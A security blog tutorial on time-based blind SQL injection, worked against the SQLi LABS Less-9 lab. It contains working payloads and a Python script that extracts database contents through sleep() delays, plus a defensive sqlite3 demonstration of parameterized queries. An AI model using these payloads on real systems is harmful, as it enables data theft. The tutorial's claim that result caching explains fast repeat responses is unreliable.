Hardcore guide to time-based blind SQL injection: principle + steps + practical walkthrough

"Author's Homepage": Shibie Sanshi wyx
"Author's Profile": CSDN top100, Alibaba Cloud blog expert, Huawei cloud expert, high-quality creator in the field of network security
"Column Introduction": This article has been entered in the column "Network Security Quick Start"

1. What is time-based blind injection?

Time-based blind injection (also called delayed injection) decides whether an injection point exists by measuring how long the page takes to respond: a payload that makes the database pause for a chosen number of seconds only when a condition is true turns the response time into a one-bit answer.

2. Usage scenarios

Time-based blind injection is a low-priority technique; it is usually considered only when union-based injection, error-based injection and Boolean-based blind injection cannot be used:

  1. The page has no echo location (union-based injection does not work)
  2. The page does not display database error messages (error-based injection cannot be used)
  3. The page returns the same single result whether the query succeeds or fails (Boolean-based blind injection cannot be used)

3. Use steps

Time-based blind injection is used in the same way as Boolean-based blind injection and can be divided into three steps.

Step 1: Determine the injection point

Try the following test payloads in turn. If the response is delayed by more than 5 seconds, the condition evaluated as true, which means the injection point exists:

?id=1 and if(1,sleep(5),3) -- a
?id=1' and if(1,sleep(5),3) -- a
?id=1" and if(1,sleep(5),3) -- a

Parenthesised variants and the various filter types follow the same pattern...

Tip: The sleep time can be customized. Too long a delay makes the process inefficient; too short a delay is hard to tell apart from normal response-time variation.

Step 2: Determine the length

Use MySQL's if() and sleep() to judge the length of the query result, starting from 1 and increasing one at a time. In the payload below, query is a placeholder for the subquery whose result you are measuring (for example database()):

?id=1' and if((length(query) =1), sleep(5), 3) -- a

If the page takes more than 5 seconds to respond, the length guess is correct (sleep(5) ran);
if the page responds within 5 seconds (normal response), the length guess is wrong, so increase the length and test again.

Step 3: Enumerate Characters

Use MySQL's if() and sleep() to judge the content of each character.
Take the first character of the query result, convert it to its ASCII code, and test the values from 32 up to 126.
For the ASCII table, please refer to my other article: ASCII code comparison table

?id=1' and if((ascii(substr(query,1,1)) =1), sleep(5), 3) -- a

If the page takes more than 5 seconds to respond, the character guess is correct;
if the page responds within 5 seconds (normal response), the guess is wrong, so move on to the next candidate value.

After the first character is successfully guessed, guess the second, the third...the nth one in turn (n represents the length of the returned result).

4. Disadvantages of time-based blind injection

  1. The time complexity of time-based blind injection is high; it consumes a lot of time.
  2. Time-based blind injection is easily affected by factors such as network fluctuation, which leads to errors.

Because time-based blind injection has a large error margin and a high time cost, in practice it is usually enough to use it to prove that the injection exists.

5. Blind injection script

Time-based blind injection is usually automated with a script. The Python script below can be modified as needed:

import requests
import time

# Replace url with the address of your lab level
# Adjust the two payloads as needed

# Target URL (without parameters)
url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/"
# Payload used to guess the length
payload_len = """?id=1' and if(
	(length(database()) ={n})
,sleep(5),3) -- a"""
# Payload used to enumerate characters
payload_str = """?id=1' and if(
	(ascii(
		substr(
		(database())
		,{n},1)
	) ={r})
, sleep(5), 3) -- a"""

# Seconds the payload sleeps; a response slower than this counts as "true"
DELAY = 5

# Determine the length
def getLength(url, payload):
    length = 1  # start testing from length 1
    while True:
        start_time = time.time()
        requests.get(url=url + payload.format(n=length))
        # page response time = end time - start time
        use_time = time.time() - start_time
        # a response slower than the sleep delay means the guess is correct
        if use_time > DELAY:
            print('Length found:', length)
            return length
        else:
            print('Testing length:', length)
            length += 1  # try the next length

# Enumerate characters
def getStr(url, payload, length):
    result = ''  # the table/database name starts out empty
    # outer loop: one character position at a time
    for l in range(1, length + 1):
        # inner loop: every printable ASCII value (32-126) for this position
        for n in range(32, 127):
            start_time = time.time()
            requests.get(url=url + payload.format(n=l, r=n))
            # page response time = end time - start time
            use_time = time.time() - start_time
            # a delayed response means this character is correct
            if use_time > DELAY:
                result += chr(n)
                print('Character', l, 'found:', result)
                break
        else:
            # no candidate delayed the response: mark the position as unknown
            result += '?'
    return result

# Start guessing
length = getLength(url, payload_len)
getStr(url, payload_str, length)

6. Practical ideas

Test Range: SQLi LABS Less 9
Injection: Single Quote Character Injection

1. Determine whether time-based blind injection exists

After the injection point is found, check whether the page is vulnerable to time-based blind injection. When both of the following conditions hold at the same time, the time-based blind injection is confirmed:

?id=1' and if(1, sleep(5), 3) -- a	response delayed by 5 seconds
?id=1' and if(0,sleep(5),3) -- a	normal response

Principle analysis

The first parameter of the if() function is a conditional expression: 1 is converted to True and 0 to False.
When the condition is True, the expression in the second parameter position, sleep(5), is evaluated and the response is delayed by 5 seconds;
when the condition is False, the expression in the third parameter position is evaluated instead, namely 3, a meaningless custom placeholder, and the page responds normally.
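To show where the delay actually comes from, and what removes it, here is an added example that is not code from the original post or from the SQLi LABS project. It rebuilds the vulnerable lookup in Python with sqlite3 standing in for MySQL: the users table, the sleep function registered on the connection and the 0.05-second delay are constructed stand-ins, CASE WHEN replaces MySQL's if() because SQLite has no if() or sleep(), and the function names lookup_vulnerable and lookup_parameterized are hypothetical. The same input that triggers the delay when concatenated into the SQL text is an inert literal when bound as a parameter, which is the fix the page's payloads point at.

```python
import sqlite3
import time

# Counts how often the emulated sleep() ran, so a test can detect the delay
# without depending on wall-clock timing.
SLEEP_CALLS = {"count": 0}


def _sleep(seconds):
    """Stand-in for MySQL sleep(): record the call, pause, return 0 like MySQL."""
    SLEEP_CALLS["count"] += 1
    time.sleep(seconds)
    return 0


def make_db():
    """Constructed lab database with a users table looked up by id."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _sleep)  # assumption: emulated delay function
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "Dumb"), (2, "Angelina")])
    return conn


def lookup_vulnerable(conn, user_input):
    """The pattern the page exploits: the id is spliced into the SQL text,
    so quotes, AND, CASE and comments in the input are parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE id='" + user_input + "' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_input,)).fetchall()


def timed(fn, conn, user_input):
    """Run a lookup and report (rows, number of sleep() calls, elapsed seconds)."""
    before = SLEEP_CALLS["count"]
    start = time.monotonic()
    rows = fn(conn, user_input)
    elapsed = time.monotonic() - start
    return rows, SLEEP_CALLS["count"] - before, elapsed


# CASE WHEN is the portable form of MySQL's if(); 0.05 s stands in for sleep(5).
PAYLOAD_TRUE = "1' and case when 1 then sleep(0.05) else 3 end -- a"
PAYLOAD_FALSE = "1' and case when 0 then sleep(0.05) else 3 end -- a"

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable),
                     ("parameterized", lookup_parameterized)):
        for label, payload in (("true", PAYLOAD_TRUE), ("false", PAYLOAD_FALSE)):
            rows, calls, secs = timed(fn, db, payload)
            print(f"{name:13s} condition={label:5s} rows={rows} "
                  f"sleep_calls={calls} elapsed={secs:.3f}s")
```

With the concatenated query the true-condition payload makes sleep() run and the false-condition payload returns the normal row, which is exactly the pair of observations section 6.1 relies on; with the bound parameter neither payload reaches the SQL parser, sleep() never runs, and the lookup simply finds no user with that id.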

2. Extracting the database

Once time-based blind injection is confirmed, the database contents can be extracted.
Extraction is divided into two steps: judging the length, then enumerating the characters.

2.1 Judging the length of the returned result

Take the length of the currently used database name as the example. First check whether the length is greater than 1:

?id=1' and if(
	(length(database()) >1)
,sleep(5),3) -- a

Principle analysis

The payload is concatenated into the SQL statement and executed as follows.

The length of the database name must be greater than 1, so if the page takes more than 5 seconds to respond, the payload works. Then test the length starting from 1 and increasing one at a time.

2.2 Enumeration characters

There are 95 characters that can appear in the database name: upper and lower case letters, digits, underscores and other special characters.
We take the first character and exhaustively enumerate these 95 possibilities. To make guessing easier, the character is converted to its ASCII code before comparison (the ASCII codes of these characters are 32~126).

First check whether the ASCII code of the first character of the currently used database name is greater than 1:

?id=1' and if(
	(ascii(
		substr(
		(database())
		,1,1)
	) >1)
, sleep(5), 3) -- a

Principle analysis

The payload is concatenated into the SQL statement and executed as follows.
The ASCII code of the first character must be greater than 1, so if the page takes more than 5 seconds to respond, the payload works.
Test the values from 32 to 126 in turn: if the page takes more than 5 seconds to respond, the guess is correct; if the page responds normally, the guess is wrong.
After the first character is guessed successfully, guess the second, third ... nth character in turn (n is the length of the returned result).

7. Telling errors apart

For the same payload, if the first response is slow but the second is fast, the slowness was caused by network fluctuation. If both responses are slow, the delay really came from the injection.

Principle: the database keeps executed SQL statements and their results in a cache to reduce load. When it executes SQL, it first looks in the cache; if the same SQL is already there, it returns the cached result directly without querying the tables.
This means that the first execution of a given SQL statement takes a long time (querying the tables), while the second execution takes almost no time (reading the cache).

Recommended column

"Network Security Quick Start" uses the shortest time to master the core network security technology.
"Shooting Range Clearance Tutorial" The customs clearance tutorials of various shooting ranges are continuously updated...

Origin blog.csdn.net/wangyuxiang946/article/details/123857045